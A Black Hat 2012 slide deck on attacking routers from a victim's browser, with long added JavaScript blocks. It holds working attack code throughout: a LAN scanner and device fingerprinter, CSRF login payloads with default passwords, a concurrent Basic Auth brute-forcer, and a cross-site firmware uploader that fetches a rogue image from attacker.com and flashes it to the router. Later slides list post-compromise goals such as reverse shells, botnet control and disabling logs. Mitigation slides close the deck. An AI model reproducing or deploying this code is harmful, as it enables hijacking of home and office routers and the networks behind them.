Background: Browser-Based Attacks


The Old Way

Traditional Browser-Based Attacks


• Crude 

• Rely heavily on social engineering and a level of user interaction that is too far-fetched for use in any meaningful attack
Traditional Network Exploitation

• Windows / Desktop OS 

• Exploit installed through SE or an unpatched vulnerability

• Pivot and Persist 

• Exfiltrate data 

• Eventually detected and removed by AV

Blended Threats


A blended threat refers to a single threat that attacks 
via multiple vectors (e.g., a worm gains entry via email 
and then leverages back-door vulnerabilities for further 
infection and destruction). 

Blended threats are inherently malicious and spread 
rapidly. 

- Trend Micro

http://apac.trendmicro.com/apac/threats/enterprise/threats-summary/blended-threats/
Blended Threats


• Lots of great research has gone into Browser-to-Network based attacks

• Why hasn't anyone ever put it all together?
How can traditional attacks go to the next level? Let's break free of the browser and into the network!
Why Attack Network Devices?

• Hard to detect attacks with AV 

• More difficult to detect infections 

• Non-standard upgrade model 

• Ignored by users as long as they keep doing their job 
SOHO Routers? On MY corporate network?

It's more likely than you think!
Routers in the Enterprise



• Home users, small business owners, careless QA engineers, even regular engineers often neglect to change defaults

• Often opting for rapid deployment over security

• May be possible to bridge to the Enterprise via VPN from compromised home users
What Would Be the Worst Case Scenario?


• Do as much as possible with browser based attacks 

• Make the end user do all the work 

• Evade detection 

• ...profit? 
This is it.

Black Hat USA 2012
Thursday, July 26, 12











All that's necessary is to run a small piece of JavaScript to kick off an attack.

Easy enough.
[Screenshot: Hotfile.com ("Free one-click file hosting") download page for "UCLFINALBayernvsChelseaHD1stH.part1.rar" (400 MB). The page shows "Please wait 37 seconds or click here to get a high speed instant download!", a Regular (Free) vs. High Speed (Premium) comparison table (download restriction: 1 file per 30 minutes vs. none; estimated download time: 1.1 hours vs. 6.7 minutes), and a wait timer.]

[Screenshot: "Take Online Survey and you may win a copy of VMware Workstation 7" advertisement.]
Don't believe it?


• Over 180 entries on Snopes.com for "facebook" 

• 30 entries on Snopes.com for "myspace" 

• Spend enough time on $social_network and the "Click like if you like puppies" spam posts pour in.

• Consider your non-technical friends and family on Facebook and what they post...
Now that our code has been deployed it is time to move on to enumeration. The key to these attacks is to locate a target-rich environment with an optimal attack surface.
JavaScript-based network scans can enumerate live devices on the victim's local network.
Network Scanning, the JavaScript Way

Several known techniques, each with their own pros and cons.

Together they demonstrate the potential for lightning-fast network enumeration through JavaScript.
[Screenshot: "Javascript port scanner (c) hipernes 2009". Modes: scan hosts / scan ports / ping host; timeout: 5000 ms; scan timing: fixed with time interval (3 s) or random with time window (500 s); option: sorted scan. Sample output:]

Request 3685686271: Host 192.168.1.1 at port 80 is up
Request 4339237899: Host 192.168.1.2 at port 80 is down
Request 9838001152: Host 192.168.1.3 at port 80 is down
Request 6624633574: Host 192.168.1.4 at port 80 is down
Request 1991588722: Host 192.168.1.5 at port 80 is down
[Screenshot: JS-Recon, "HTML5 based JavaScript Network Reconnaissance Tool", www.andlabs.org/tools/jsrecon.html (feedback/comments/questions: @lavakumark). Modes: Port Scanning, Network Scanning, Discover My Private IP. Inputs: IP address, start port, end port; protocol: Cross Origin Requests or WebSockets. Notes from the tool page:]

* Tuned to scan fast internal networks. Scanning public/slow networks would require retuning.

* Works only on the versions of Firefox, Chrome (recommended) and Safari that support Cross Origin Requests/WebSockets.

* Currently works on WINDOWS ONLY.
Network Scanning, the JavaScript Way

Web browsers do not differentiate between resources located on the Internet and resources on the internal network.

If a web page requests to load an image or document from an internal IP address such as "http://192.168.1.1:80/logo.jpg", the browser makes a request on the LAN to see if it is available.
<iframe onload="foundactivehost(this);" src="http://192.168.100.1:80"></iframe>

<img onload="lanScanner.handleProbe(this);" src="http://192.168.100.1/images/thomson.gif">
JavaScript can additionally utilize Cross-Origin Requests and WebSockets to speed up this scan.
Network Scanning, the JavaScript Way

// ip and current_port are set by the surrounding scan loop (not shown on the slide);
// check_xhr() / check_ws() inspect readyState a few milliseconds later: a host that
// answers at all (even with an error) changes state quickly, a silent host does not.

// with CORS
{
    xhr = new XMLHttpRequest();
    xhr.open('GET', "http://" + ip + ":" + current_port);
    xhr.send();
    setTimeout("check_xhr()", 5);
}

// with Web Sockets
{
    ws = new WebSocket("ws://" + ip + ":" + current_port);
    setTimeout("check_ws()", 5);
}
Network Scanning, the JavaScript Way

By attempting to load multiple resources within a range of IP addresses, JavaScript is able to determine which hosts are up and which are unavailable.

By mapping the default IP addresses used by common devices and recognizing where device-specific resources are located on each device, a JavaScript scanner can determine which device it is talking to.
Network Scanning, the JavaScript Way

• JavaScript-based scanners can use images and other resources to fingerprint devices

• jslanscanner: database of nearly 200 devices; enumerates by comparing the existence or absence of files included within certain models of network devices that are absent in others

• A determined attacker could fine-tune utilities like jslanscanner and add hundreds of additional devices
Making Network Scanning Better

• Netgear routers have predefined DNS records for "http://www.routerlogin.net"

[http://kb.netgear.com/app/answers/detail/a_id/12744/~/how-to-view-or-change-your-wireless-network-password]

• Bonjour (mDNS, or "Zero Conf") host names, such as "http://freenas.local" for the FreeNAS open source storage system, make enumeration easy.
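The scan logic from the preceding slides, as an added example that is not part of the deck and not code from jslanscanner or JS-Recon: host discovery by request timing (the XHR/WebSocket idea above), device fingerprinting by which images load and which do not (the jslanscanner approach), and the routerlogin.net / .local host-name shortcut from this slide. The device names, fingerprint paths and the fake LAN are assumptions made up for illustration. The probe and image-check functions are injected, so the same logic runs in a browser (browserProbe, browserImageExists) or offline under Node against the constructed LAN (labProbe, labImageExists).

```javascript
// Added example: JavaScript LAN discovery + device fingerprinting.
// Not from the slides; device names and paths below are hypothetical.

// Fingerprint database. A device matches when every "present" image loads
// and every "absent" image fails to load (the jslanscanner idea).
const FINGERPRINTS = {
  'Thomson TG585': { present: ['/images/thomson.gif'], absent: ['/images/linksys_logo.gif'] },
  'Linksys WRT54G': { present: ['/images/linksys_logo.gif', '/images/UI_Cisco.gif'], absent: ['/images/thomson.gif'] },
};

// Hosts worth trying by name before sweeping an IP range.
const WELL_KNOWN = ['http://www.routerlogin.net/', 'http://freenas.local/'];

// Expand 192.168.1.<first>..<last> into probe URLs.
function ipRange(prefix, first, last, port) {
  const urls = [];
  for (let i = first; i <= last; i++) urls.push(`http://${prefix}.${i}:${port}/`);
  return urls;
}

// Browser probe. Resolved no-cors fetch => something answered (opaque
// response, even a 401/404). Fast rejection => TCP RST, host up but port
// closed. Abort on timeout => nobody home.
function browserProbe(url, timeoutMs) {
  const ctrl = new AbortController();
  const timer = setTimeout(() => ctrl.abort(), timeoutMs);
  return fetch(url, { mode: 'no-cors', cache: 'no-store', signal: ctrl.signal })
    .then(() => 'open')
    .catch(() => (ctrl.signal.aborted ? 'silent' : 'closed'))
    .finally(() => clearTimeout(timer));
}

// Browser image check: <img> fires load only for a real image at that URL.
function browserImageExists(url, timeoutMs = 2000) {
  return new Promise((resolve) => {
    const img = new Image();
    const timer = setTimeout(() => { img.src = ''; resolve(false); }, timeoutMs);
    img.onload = () => { clearTimeout(timer); resolve(true); };
    img.onerror = () => { clearTimeout(timer); resolve(false); };
    img.src = url + '?nocache=' + Date.now();
  });
}

// Anything that answered, open or closed, is a live host.
async function discoverHosts(urls, probe, timeoutMs = 1000) {
  const states = await Promise.all(urls.map((u) => probe(u, timeoutMs)));
  return urls.filter((_, i) => states[i] !== 'silent');
}

// First device whose present/absent image sets both check out, else 'unknown'.
async function fingerprintHost(baseUrl, imageExists) {
  const origin = baseUrl.replace(/\/$/, '');
  for (const [device, sig] of Object.entries(FINGERPRINTS)) {
    const present = await Promise.all(sig.present.map((p) => imageExists(origin + p)));
    const absent = await Promise.all(sig.absent.map((p) => imageExists(origin + p)));
    if (present.every(Boolean) && !absent.some(Boolean)) return device;
  }
  return 'unknown';
}

// Constructed offline LAN: .1 is a Thomson gateway, .10 a Linksys router,
// .20 answers with an RST on port 80, everything else never answers.
const LAB_PORTS = {
  'http://192.168.1.1:80/': 'open',
  'http://192.168.1.10:80/': 'open',
  'http://192.168.1.20:80/': 'closed',
};
const LAB_IMAGES = new Set([
  'http://192.168.1.1:80/images/thomson.gif',
  'http://192.168.1.10:80/images/linksys_logo.gif',
  'http://192.168.1.10:80/images/UI_Cisco.gif',
]);
const labProbe = (url) => Promise.resolve(LAB_PORTS[url] || 'silent');
const labImageExists = (url) => Promise.resolve(LAB_IMAGES.has(url));

// Run the whole pipeline against the constructed LAN.
async function labScan() {
  const targets = WELL_KNOWN.concat(ipRange('192.168.1', 1, 20, 80));
  const live = await discoverHosts(targets, labProbe, 50);
  const result = {};
  for (const host of live) result[host] = await fingerprintHost(host, labImageExists);
  return result;
}

labScan().then((r) => console.log(r));
```

In a browser the attack page calls discoverHosts(urls, browserProbe) and then fingerprintHost(host, browserImageExists). The timeout has to be tuned per network, as the JS-Recon note says, and a resolved no-cors fetch only tells you that a TCP connection completed and something answered, not what the status code was. Newer Chrome versions also restrict requests from public web pages to private addresses (Private Network Access), which is the first mitigation the deck asks for, so this works less reliably from an arbitrary Internet site than it did in 2012.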
Limitations of JavaScript Based Network Scanning

For now there is no easy way to determine the client's internal IP address without implementing additional non-JavaScript code.

Easy enough with the Java plugin or some other code.

(But this talk is about big attack surfaces and standard browser functionality, so we're trying to avoid that.)
Gaining Control

Authentication

[Screenshots of router login prompts: a browser Basic Authentication dialog ("A username and password are being requested by http://192.168… The site says: 'NETGEAR DG834N'"); a D-Link DIR-655 login page (Hardware Version: A2, Firmware Version: 1.21) reading "Log in to the router. User Name: Admin / Password: [ ] / Login"; and a third router login form with User Name / Password / LOGIN fields.]
[Screenshot: Cisco RV180 Router Setup Wizard at https://192.168.1.1/platform.cgi, step 4 of 4 ("1. Welcome, 2. Check Connection, 3. Configure Router, 4. Enable Security"), "Enable Security - Set Router Password":]

"The administrative router password protects your router from unauthorized access. For security reasons, you should change the router password from its default settings. Please write this password down for future reference."

Router Password: [      ]   Confirm Password: [      ]   [ ] Disable Password Strength Enforcement

"Click Submit to enable security on your new Cisco router."  [Submit] [Cancel]
[Screenshot: www.routerpasswords.com, "Select Router Make: NETGEAR", Find Password:]

Manufacturer  Model                          Protocol  Username  Password
NETGEAR       RM356 Rev. NONE                TELNET    (none)    1234
NETGEAR       WGT624 Rev. 2                  HTTP      admin     password
NETGEAR       COMCAST Rev. COMCAST-SUPPLIED  HTTP      Comcast   1234
NETGEAR       FR314                          HTTP      admin     password
NETGEAR       MR-314 Rev. 3.26               HTTP      admin     1234
NETGEAR       RT314                          HTTP      admin     admin
NETGEAR       RP614                          HTTP      admin     password
NETGEAR       RP114 Rev. 3.26                TELNET    (none)    1234
[Screenshot: routerpwn.com vendor index: 2Wire, 3Com, Arris, Asmax, Belkin, Cisco, Comtrend, DD-Wrt, Motorola, Netgear, Pirelli, Sagem, Siemens, Thomson, TP-Link, TRENDnet]

Authentication

• Basic Authentication

  • Authorization: Basic [username:password] (Base64 encoded)

• Traditional Form POST Authentication
Authentication

Basic Authentication CSRF:

<img src="http://admin:admin@192.168.1.1/" />
Authentication

Form POST CSRF:

<form method='post' action='http://192.168.1.1'>
<input type='text' value='admin' name='username' />
<input type='text' value='admin' name='password' />
<input type='submit' value='submit' />
</form>

<script>document.forms[0].submit()</script>
Authentication

Even easier if there's XSS in the router UI.

<script>
x = new XMLHttpRequest();
x.open('GET', 'http://192.168.1.1/', true);
x.setRequestHeader('Authorization', 'Basic YWRtaW46YWRtaW4=');
x.send();
</script>
Basic Auth Brute Force

• Successful login attempts return 200 OK

• Unsuccessful login attempts return 401 Unauthorized, and prompt the user for re-authentication. This gives away the attack, or at least slows it down.

• However...
[Screenshot: code.google.com/p/chromium/issues/detail?id=21628]

Issue 21628: Security: Should not show basic HTTP auth dialogs for subresource loads, particularly images

Status: Duplicate. Closed: May 2011.

Reported by project member scarybea...@gmail.com, Sep 11, 2009

This is a generic bug affecting all browsers — but perhaps something we can trivially tighten up in Chrome for a good benefit.

The issue is that many many web apps (Orkut in the case that was brought to our attention) but also Gmail etc. permit the rendering of an <img> tag with an arbitrary "src" parameter.

The issue is that if the "src" parameter refers to a resource which responds with a HTTP 401 plus HTTP header indicating basic auth — the browser will pop-up a little login dialog. This might be abused for phishing as the appearance to the untrained eye would be that the trusted site popped up the dialog.

Comment 1 by lcam...@gmail.com, Sep 14, 2009

To play evil's advocate, maybe the sentiment that prompts do not work is misplaced
[Screenshot: The Chromium Blog, blog.chromium.org/2011/06/new-chromium-security-features-june.html]

New Chromium security features, June 2011
Tuesday, June 14, 2011
Labels: security

Chromium 13: blocking HTTP auth for subresource loads

There's an unfortunate conflict between a browser's HTTP basic auth dialog, the location bar, and the loading of subresources (such as attacker-provided <img> tag references). It's possible for a basic auth dialog to pop up for a different origin from the origin shown in the URL bar. Although the basic auth dialog identifies its origin, the user might reasonably look to the URL bar for trust guidance.

To resolve this, we've blocked HTTP basic auth for subresource loads where the resource origin is different to the top-level URL bar origin. We also added the command line flag switch --allow-cross-origin-auth-prompt in case anyone has legacy applications which require the old behavior.

Chromium 13: Content-Security-Policy support

We added an initial implementation of Content Security Policy, which was first introduced in Firefox 4.
Basic Auth Brute Force

• Asynchronous JavaScript Resource Requests

• When the file loads, exit out of the script

• 100 attempts < 2 sec

Demo
[Screenshot: brute-force demo. The page reports the hit, and the Chrome DevTools Network panel shows the requests brute.html:31 issued to http://192.168.1.1/index.asp, each with a different user:pass pair embedded in the URL. The losing attempts are cancelled once the right one loads.]

Username: admin
Password: admin

Name       Method  Status      Type    Initiator      Size      Time   URL
index.asp  GET     (canceled)  text/…  brute.html:31  512 B     1.60s  http://Joseph:Joseph@…
index.asp  GET     (canceled)  text/…  brute.html:31  512 B     1.62s  http://junior:junior@…
index.asp  GET     (canceled)  text/…  brute.html:31  512 B     1.64s  http://softball:softball@…
index.asp  GET     (canceled)  text/…  brute.html:31  512 B     1.65s  http://taylor:taylor@…
index.asp  GET     (canceled)  text/…  brute.html:31  512 B     1.67s  http://yellow:yellow@…
index.asp  GET     (canceled)  text/…  brute.html:31  512 B     1.69s  http://daniela:daniela@…
index.asp  GET     (canceled)  text/…  brute.html:31  512 B     1.71s  http://lauren:lauren@…
index.asp  GET     (canceled)  text/…  brute.html:31  512 B     1.72s  http://mickey:mickey@…
index.asp  GET     (canceled)  text/…  brute.html:31  512 B     1.74s  http://princesa:princesa@…
index.asp  GET     200 OK      text/…  brute.html:31  65.75 KB  2.19s  http://admin:admin@…

102 requests | 116.35 KB transferred
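The loop behind the demo above, as an added example that is not the authors' brute.html. It follows the slide's recipe: many resource loads in flight at once, stop on the first 200 and cancel the rest. The candidate list is built to resemble the trace (words used as both user name and password, plus a few defaults from the routerpasswords.com table). Two attempt functions are provided for the browser: scriptAttempt embeds user:pass in the URL the way the DevTools trace shows, and xhrAttempt sets the Authorization header itself, which only works same-origin (the XSS case). labAttempt is a constructed stand-in for a router that accepts admin:admin, so the loop runs offline.

```javascript
// Added example: browser-driven HTTP Basic Auth brute force.
// Not the authors' code; labAttempt is a constructed fake router.

// Authorization: Basic base64(user:pass). admin:admin => YWRtaW46YWRtaW4=
function encodeBasic(user, pass) {
  const raw = `${user}:${pass}`;
  return typeof btoa === 'function' ? btoa(raw) : Buffer.from(raw, 'latin1').toString('base64');
}

// Candidate pairs, constructed to look like the demo's list (which was longer).
function candidates() {
  const words = ['joseph', 'junior', 'softball', 'taylor', 'yellow', 'daniela', 'lauren', 'mickey', 'princesa'];
  const defaults = [['admin', 'password'], ['admin', '1234'], ['Admin', ''], ['admin', 'admin']];
  return words.map((w) => [w, w]).concat(defaults);
}

// Browser attempt, cross-origin: load the protected page as a <script> with
// the credentials in the URL. A 200 fires load (even though the HTML fails to
// parse as JavaScript); a 401 fires error. Aborting just drops the element.
function scriptAttempt(target, user, pass, signal) {
  return new Promise((resolve) => {
    const s = document.createElement('script');
    const done = (ok) => { s.remove(); resolve(ok); };
    signal.addEventListener('abort', () => done(false), { once: true });
    s.onload = () => done(true);
    s.onerror = () => done(false);
    s.src = target.replace('://', `://${encodeURIComponent(user)}:${encodeURIComponent(pass)}@`);
    document.head.appendChild(s);
  });
}

// Browser attempt, same-origin only (e.g. from XSS in the router UI): a custom
// Authorization header on a cross-origin request would trigger a CORS
// preflight the router does not answer.
function xhrAttempt(target, user, pass, signal) {
  return fetch(target, { headers: { Authorization: 'Basic ' + encodeBasic(user, pass) }, signal })
    .then((r) => r.status === 200)
    .catch(() => false);
}

// N workers pull from a shared queue; the first success aborts everything
// else, which is why the losers show up as "(canceled)" in DevTools.
async function bruteForce(target, pairs, attempt, concurrency = 10) {
  const queue = pairs.slice();
  const ctrl = new AbortController();
  let found = null;
  let tried = 0;
  async function worker() {
    while (queue.length > 0 && found === null) {
      const [user, pass] = queue.shift();
      tried += 1;
      const ok = await attempt(target, user, pass, ctrl.signal);
      if (ok && found === null) {
        found = { user, pass };
        ctrl.abort();
      }
    }
  }
  await Promise.all(Array.from({ length: concurrency }, worker));
  return { found, tried };
}

// Constructed router stand-in for offline runs: only admin:admin is accepted.
function labAttempt(target, user, pass, signal) {
  if (signal.aborted) return Promise.resolve(false);
  return Promise.resolve(user === 'admin' && pass === 'admin');
}

bruteForce('http://192.168.1.1/index.asp', candidates(), labAttempt)
  .then((r) => console.log(r)); // found: { user: 'admin', pass: 'admin' }
```

Run in a browser as bruteForce(target, candidates(), scriptAttempt). Two caveats the slides only hint at: the URL-embedded credential trick depends on the browser forwarding user:pass from a subresource URL to the 401 challenge, which Chrome has refused to do since version 59; and because the device answers every wrong guess with a 401, a router that logs failed logins or rate-limits them turns the "100 attempts in under 2 seconds" figure into a very visible event.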
Modifying Firmware

• firmware-mod-kit
  http://code.google.com/p/firmware-mod-kit/

• wrt-firmware-tools
  https://github.com/coolaj86/wrt-firmware-tools

• dd-wrt
  http://www.dd-wrt.com/site/index

How do you install the rogue firmware?
• Browser and Flash bugs allowed for CSRF of text files, but it's been patched

• Browsers don't give enough control over the HTTP request

• Browsers do not handle binary data in form fields

• JavaScript mangles binary data
Can we take over an entire network by combining JavaScript attacks?

1. Victim visits attack site

2. Attack site instructs victim to access malicious firmware and store it in memory

3. The stored firmware is uploaded to the network device

Demo


function fileUpload() {
    x = new XMLHttpRequest();
    x.open("get", "//attacker.com/bad_firmware.bin");
    // x-user-defined keeps every response byte as one char code (0x00-0xFF)
    // instead of decoding it as text, so the firmware is not mangled
    x.overrideMimeType("text/plain; charset=x-user-defined");
    x.onreadystatechange = function() { ...
        // body: multipart form built from x.responseText (elided on the slide)
        xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.1.1/upgrade.cgi", true);
        xhr.withCredentials = true;
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---x");
        // sendAsBinary (Firefox-only at the time) sends the string byte-for-byte
        xhr.sendAsBinary(body);
    }
    x.send();
}

<img src="http://admin:admin@192.168.1.1/" onerror="fileUpload();" />
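The upload body built byte-exactly, as an added example that is not the authors' ddwrt-install-tool code. Today's browsers hand the fetched firmware over as an ArrayBuffer, so the x-user-defined charset and the Firefox-only sendAsBinary in the slide code are no longer needed; the multipart body is assembled from Uint8Arrays and never passes through a JavaScript string. The block also shows the mangling that happens when it does, and includes the device-side parse so the round trip can be checked before pointing it at hardware. The field names, the filename and the /upgrade.cgi endpoint are assumptions, and SAMPLE_FIRMWARE is a constructed byte sequence, not a real image.

```javascript
// Added example: binary-safe multipart/form-data for a firmware upload.
// Not from the slides; field names and endpoint are hypothetical.

const enc = new TextEncoder();

// What the naive approach does: bytes >= 0x80 pushed through a JS string
// and UTF-8 encoded become two bytes each, corrupting the image.
function utf8Mangle(bytes) {
  return enc.encode(String.fromCharCode(...bytes));
}

// Text headers and the raw file bytes are concatenated as bytes; the file
// is never decoded, so 0x00, 0x80 and 0xFF survive untouched.
function buildMultipart(boundary, fields, fileField, filename, bytes) {
  const parts = [];
  for (const [name, value] of Object.entries(fields)) {
    parts.push(enc.encode(`--${boundary}\r\nContent-Disposition: form-data; name="${name}"\r\n\r\n${value}\r\n`));
  }
  parts.push(enc.encode(
    `--${boundary}\r\nContent-Disposition: form-data; name="${fileField}"; ` +
    `filename="${filename}"\r\nContent-Type: application/octet-stream\r\n\r\n`));
  parts.push(bytes);
  parts.push(enc.encode(`\r\n--${boundary}--\r\n`));
  const body = new Uint8Array(parts.reduce((n, p) => n + p.length, 0));
  let off = 0;
  for (const p of parts) { body.set(p, off); off += p.length; }
  return body;
}

// Byte-level indexOf, since the body is not a string.
function indexOfBytes(hay, needle, from = 0) {
  outer: for (let i = from; i + needle.length <= hay.length; i++) {
    for (let j = 0; j < needle.length; j++) if (hay[i + j] !== needle[j]) continue outer;
    return i;
  }
  return -1;
}

// What the device's CGI has to do: pull the file part back out of the body.
function extractFilePart(body, boundary, fileField) {
  const start = indexOfBytes(body, enc.encode(`name="${fileField}"`));
  if (start < 0) return null;
  const headerEnd = indexOfBytes(body, enc.encode('\r\n\r\n'), start);
  if (headerEnd < 0) return null;
  const dataEnd = indexOfBytes(body, enc.encode(`\r\n--${boundary}`), headerEnd + 4);
  if (dataEnd < 0) return null;
  return body.slice(headerEnd + 4, dataEnd);
}

// Constructed "firmware": every byte value once, so any mangling shows up.
const SAMPLE_FIRMWARE = Uint8Array.from({ length: 256 }, (_, i) => i);
const BOUNDARY = '----xdeadbeefcafe';

// Build, parse back, compare: true only if every byte came through intact.
function roundTrip(bytes) {
  const body = buildMultipart(BOUNDARY, { action: 'upgrade' }, 'file', 'firmware.bin', bytes);
  const back = extractFilePart(body, BOUNDARY, 'file');
  return back !== null && back.length === bytes.length && back.every((b, i) => b === bytes[i]);
}

// Browser side: fetch the image as an ArrayBuffer and POST it with the
// router session cookie attached. multipart/form-data is a CORS-safelisted
// content type, so the no-cors POST needs no preflight.
async function uploadFirmware(firmwareUrl, routerUrl) {
  const fw = new Uint8Array(await (await fetch(firmwareUrl)).arrayBuffer());
  const boundary = '----x' + Math.random().toString(16).slice(2);
  const body = buildMultipart(boundary, { action: 'upgrade' }, 'file', 'firmware.bin', fw);
  return fetch(routerUrl, {
    method: 'POST', mode: 'no-cors', credentials: 'include',
    headers: { 'Content-Type': `multipart/form-data; boundary=${boundary}` },
    body,
  });
}

console.log('round trip ok:', roundTrip(SAMPLE_FIRMWARE),
            'mangled length:', utf8Mangle(SAMPLE_FIRMWARE).length); // true 384
```

The same body can be produced by appending a Blob to a FormData object and letting fetch choose the boundary; building it by hand is worth it when the device's CGI is picky about field order or header layout, and roundTrip is the check to run first. The upload goes out with credentials: 'include' so the session cookie obtained by the CSRF login rides along, which is exactly why the deck's last mitigation slide asks for CSRF protection and signed firmware on the device side.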
See all the code on GitHub!

dd-wrt-install-tool
https://github.com/superevr/ddwrt-install-tool
• Sniffing (Man In The Middle)

• Propagation via iframe, rogue AP, etc 

• Insert payload into all http requests/responses 

• Disable Logging 

• Pivoting (ssh tunnel, OpenVPN, etc) 

• Whatever you need to do to get paid. 
• Custom firmware via readily available Linux tools

• Botnet C&C 

• Reverse SSH Shell 

• Bind Shell? (Why not? We own the router, we own 
the port forwarding settings) 

• Port Knocking Backdoor 
• Traditional client-side attacks fail if browser and/or third-party plugin software is patched.

• With CSFU, the capability only exists in the most modern browsers

• Radical shift in the web-based attack paradigm
• Does not rely on browser remaining open once attack completes

• Can propagate deeper into the network

• Better persistence

• Harder to discover

• Immune to anti-virus


• So many unique devices out there, whereas an exploit for Windows is "program once, conquer everywhere"

• Takes a lot of extra effort and pre-work compared to Windows malware

• Victims may not be on the latest browsers that support CORS

• If network devices have unique passwords, you are not guaranteed an exploit
Mitigation

• Sites from the Internet shouldn't be able to access the private IP address ranges specified in RFC 5735

• Cross-Origin Resource Sharing should be MORE restrictive

• Cross-Site Request Forgery protections on embedded devices

Mitigation (cont.)




• Automatic updates 

• Signed firmware modules 

• Treat JavaScript like third-party plug-ins such as Java or Flash when deployed in the Enterprise

• Heuristics for CSFU 
Overview

4 Simple Facts:

1. Devices on your network have web apps with vulnerabilities

2. Your web browser allows attack sites to access these devices

3. Attackers can use CSRF to log in to these devices

4. Attackers can replace the operating system (firmware) of these devices to perform their malicious activities
On the Shoulders of Giants...

• Hacking Intranet Websites from the Outside - BH2006, Grossman

• CSRF - Yeah, it still works - Defcon 17, McRee, Bailey

• Remote Attacks Against SOHO Routers - BH2010, Heffner

• How to upload arbitrary file contents - blog.kotowicz.net, Kotowicz

• And Many Others
Thank you!




Phil Purviance @superevr / superevr.com 
Josh Brashars @savant42 


Demo Code: 

https://github.com/superevr/ddwrt-install-tool 
WRT54GL Errata





• If you upload firmware > 4MB you get the message alert("Upgrade are failed!")

• Comments on the welcome page state "This software should be used as a reference only, and it not intended for production use!"
AT






• XSS on auth/unauth portions of site 

• Local File Inclusion via Path Traversal Attack 

• Source Code Disclosure 

• CSRF to change the admin password 

• Released April, 2012 
SonicWALL Internet Security Appliance Errata

• Unique CSRF/password storage scheme

• Upon login, JavaScript takes your password, combines it with a nonce, and hashes it before sending it over the wire

• Has XSS on unauthenticated pages, allowing the login to be CSRF brute forced